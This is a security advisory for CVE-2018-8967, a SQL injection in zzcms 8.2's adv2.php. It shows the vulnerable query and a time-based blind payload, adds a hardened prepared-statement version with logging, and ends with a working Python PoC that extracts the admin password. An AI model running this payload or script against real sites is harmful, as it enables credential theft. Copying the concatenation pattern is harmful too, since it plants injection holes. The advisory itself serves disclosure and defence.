CVE-2018-8967: vulnerability/adv2.php.md at master · Ni9htMar3/vulnerability
An issue was discovered in zzcms 8.2. It allows SQL injection via the id parameter in an adv2.php?action=modify request.
title: adv2.php
tags: 新建,模板,小书匠
grammar_cjkRuby: true
/user/adv2.php

**Edition :**
zzcms 8.2
**Location**
/user/adv2.php
**Code:**
```php
$rs=query("select * from zzcms_ad where id=".$_POST["id"]."");
```
**Rows : 72**
**Harm**
The administrator password can be obtained through SQL injection.
**Cause**
Look at the logic around the bug. Reading back up through the code from the vulnerable query, the request first has to reach this point, which requires that `a` and `c` are not both 0.
In other words, either `zzcms_main` or `zzcms_zh` must have a value; if neither does, the page simply tells the user they have no permission. So those values are POSTed directly.
Reading further back, the request also needs `action=modify`.
At that point, debugging in PhpStorm with `id=0 or if((select ascii(substr(pass,1,1)) from zzcms_admin)=50,sleep(5),0)` shows that the response really is delayed.
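As an added example (not code from the zzcms project or from this writeup), here is the reported vulnerable pattern beside a hardened version of the same lookup. It assumes a `mysqli` connection in `$db` (hypothetical) rather than zzcms's own `query()` helper, and the function names are invented for illustration.

```php
<?php
// Added example: the vulnerable pattern from the writeup beside a hardened version.
// Assumes a mysqli connection in $db (hypothetical); zzcms's query() helper is not used.

// --- Vulnerable pattern (as reported): the raw POST value is concatenated into the SQL text.
// A value such as  0 or if((select ascii(substr(pass,1,1)) from zzcms_admin)=50,sleep(5),0)
// becomes part of the statement, so the server sleeps whenever the guessed byte is right.
function load_ad_vulnerable(mysqli $db, array $post): ?array
{
    $sql = "select * from zzcms_ad where id=" . $post["id"] . "";
    $rs = $db->query($sql);
    return $rs ? $rs->fetch_assoc() : null;
}

// --- Hardened version: validate the type first, then bind the value as a parameter.
function load_ad_hardened(mysqli $db, array $post): ?array
{
    // id must be a positive integer; anything else is rejected before any SQL is built.
    $id = filter_var(
        $post["id"] ?? null,
        FILTER_VALIDATE_INT,
        ["options" => ["min_range" => 1]]
    );
    if ($id === false) {
        // Logging the rejection gives defenders a signal: many rejected, SQL-looking
        // values on one parameter from one client is what a blind probe looks like.
        error_log(
            "adv2.php: rejected non-integer id from "
            . ($_SERVER["REMOTE_ADDR"] ?? "unknown")
        );
        return null;
    }

    // Prepared statement: the value travels separately from the SQL text,
    // so it can never change the structure of the statement.
    $stmt = $db->prepare("SELECT * FROM zzcms_ad WHERE id = ?");
    $stmt->bind_param("i", $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}
```

The two layers are deliberate: the integer check alone would already block the payload from the writeup, and the bound parameter protects the query even if a future change loosens the validation. The `error_log` line is what turns a repeated time-based probe into something visible in the application log, since the injected value is in the POST body and never appears in ordinary web-server access logs.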
**PoC**
```python
import requests

# Time-based blind injection: a delayed response means the guessed byte is correct.
s = requests.session()
url = "http://127.0.0.1:8080/user/adv2.php?action=modify"
cookies = {'UserName': 'test2'}
flag = ''
for i in range(1, 40):
    for j in range(33, 125):
        data = {
            'id': '0 or if((select ascii(substr(pass,{},1)) from zzcms_admin)={},sleep(3),0)'.format(i, j)
        }
        # print(data)
        r = s.post(url, data=data, cookies=cookies)
        # print(r.text)
        sec = r.elapsed.seconds
        # print(i, j, sec)
        if sec > 2:
            flag += chr(j)
            print(flag)
            break
print(flag)
```
Get the administrator password